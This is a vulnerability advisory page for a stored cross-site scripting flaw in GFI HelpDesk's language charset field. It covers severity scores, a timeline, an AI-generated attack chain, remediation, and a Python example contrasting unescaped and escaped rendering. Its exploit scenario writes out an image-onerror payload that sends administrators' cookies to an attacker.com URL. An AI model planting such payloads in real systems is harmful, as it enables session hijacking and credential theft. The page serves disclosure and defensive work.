
Helpdesk EUVD-2026-23928 | CVE-2026-23753 (MEDIUM)

Type: Cross-site Scripting (XSS) (CWE-79)
Published: 2026-04-20
Sources: VulnCheck, GHSA-xj4v-3q69-qpxx
Score: 4.8 (CVSS 4.0, NVD)

Severity by source

NVD (primary): 4.8 MEDIUM
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS Vector (NVD)

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Attack Vector: Network
Attack Complexity: Low
Privileges Required: High
User Interaction: Passive (P)
Scope: X (not defined)

Lifecycle Timeline (5 events)

Apr 20, 2026 18:28, vuln.today: Analysis generated
Apr 20, 2026 18:00, euvd: EUVD ID assigned (EUVD-2026-23928)
Apr 20, 2026 18:00, vuln.today: Analysis generated
Apr 20, 2026 18:00, nvd: Patch released (patch available)
Apr 20, 2026 17:33, nvd: CVE published (MEDIUM 4.8)

Description (source: CVE.org)

GFI HelpDesk before 4.99.9 contains a stored cross-site scripting vulnerability in the language management functionality where the charset POST parameter is passed directly to SWIFT_Language::Create() without HTML sanitization and subsequently rendered unsanitized by View_Language.RenderGrid(). An authenticated administrator can inject arbitrary JavaScript through the charset field when creating or editing a language, and the payload executes in the browser of any administrator viewing the Languages page.

Analysis (AI-generated)

GFI HelpDesk before version 4.99.9 contains a stored cross-site scripting vulnerability in language management where the charset POST parameter is not HTML-sanitized before being rendered by the View_Language.RenderGrid() function. An authenticated administrator can inject arbitrary JavaScript through the charset field when creating or editing a language, with the payload executing in the browsers of other administrators viewing the Languages page. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata.

Recon: Obtain administrator credentials
Delivery: Access language management interface
Exploit: Inject XSS payload in charset field
Install: Payload stored in database
C2: Victim admin views Languages page
Execute: JavaScript executes in victim browser
Impact: Session hijacking or credential theft

Vulnerability Assessment (AI-generated)

Exploitation: Exploitation requires a valid administrator account with access to the language management functionality in GFI HelpDesk. … Additional conditions and limiting factors are described in the full assessment.

Risk Assessment: CVSS 4.8 (Medium) with network vector, low complexity, and high privileges required (PR:H) reflects the moderate real-world risk. …

Exploit Scenario: A malicious administrator, or an attacker who has compromised an administrator account, logs into GFI HelpDesk and navigates to the language management section. They create a new language or edit an existing one, injecting a JavaScript payload such as '<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">' into the charset field. …

Remediation: Upgrade GFI HelpDesk to version 4.99.9 or later, which addresses the vulnerability by implementing proper input sanitization and output encoding in the language management functionality. …
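The description above names the two missing controls (no sanitization when the charset POST parameter is stored, no encoding when View_Language.RenderGrid() renders it) and the remediation names their fixes (input sanitization and output encoding). The following is an added illustration in Python, not code from GFI HelpDesk or the SWIFT framework: a hypothetical, minimal stand-in for the Languages grid that shows the vulnerable rendering pattern beside the hardened one, plus an input-side check for the charset field. The function names (render_grid_unsafe, render_grid_safe, validate_charset), the row layout, and the sample rows are all constructed for this example; the markup-bearing charset value in the third row is a generic probe string, not the advisory's payload.

```python
import codecs
import html
import re

# Constructed sample rows standing in for stored Languages data. The third
# row carries a charset value containing markup, which is the class of input
# the advisory describes reaching the grid unsanitized.
SAMPLE_LANGUAGES = [
    {"title": "English (US)", "charset": "UTF-8"},
    {"title": "Deutsch", "charset": "ISO-8859-1"},
    {"title": "Probe", "charset": '<img src=x onerror="alert(1)">'},
]

# IANA charset names use a small ASCII repertoire and are at most 40 characters;
# angle brackets, quotes and spaces can never be part of a legitimate value.
_CHARSET_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._:+-]{0,39}$")


def validate_charset(value: str) -> str:
    """Input-side control: accept only a syntactically valid, known encoding name.

    Rejecting the value at write time means nothing markup-like is ever stored,
    independent of how the grid later renders it.
    """
    if not _CHARSET_NAME.match(value):
        raise ValueError("charset contains characters not allowed in an encoding name")
    try:
        codecs.lookup(value)  # existence check: the name must map to a real codec
    except LookupError as exc:
        raise ValueError(f"unknown charset: {value!r}") from exc
    return value


def render_grid_unsafe(rows) -> str:
    """Vulnerable pattern: stored values are interpolated into HTML verbatim."""
    cells = "".join(
        f"<tr><td>{r['title']}</td><td>{r['charset']}</td></tr>" for r in rows
    )
    return f"<table>{cells}</table>"


def render_grid_safe(rows) -> str:
    """Hardened pattern: every stored value is HTML-entity-encoded at output time.

    html.escape turns <, >, &, " and ' into entities, so a stored value is shown
    as text and cannot open a tag or attribute in the administrator's browser.
    """
    cells = "".join(
        f"<tr><td>{html.escape(r['title'])}</td><td>{html.escape(r['charset'])}</td></tr>"
        for r in rows
    )
    return f"<table>{cells}</table>"


def raw_tag_survives(rendered: str, marker: str = "<img") -> bool:
    """Demonstration helper: did a tag from user data reach the output unencoded?"""
    return marker in rendered


if __name__ == "__main__":
    print("unsafe render leaks a tag:", raw_tag_survives(render_grid_unsafe(SAMPLE_LANGUAGES)))
    print("safe render leaks a tag:  ", raw_tag_survives(render_grid_safe(SAMPLE_LANGUAGES)))
    for row in SAMPLE_LANGUAGES:
        try:
            print("accepted charset:", validate_charset(row["charset"]))
        except ValueError as err:
            print("rejected charset:", err)
```

The two controls are deliberately independent: output encoding in the grid protects administrators even if bad data is already in the database (for example rows written before an upgrade), while the charset validator keeps new bad data out and doubles as a detection point, since a rejected write with markup in the charset field is worth logging.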



EUVD-2026-23928 vulnerability details – vuln.today
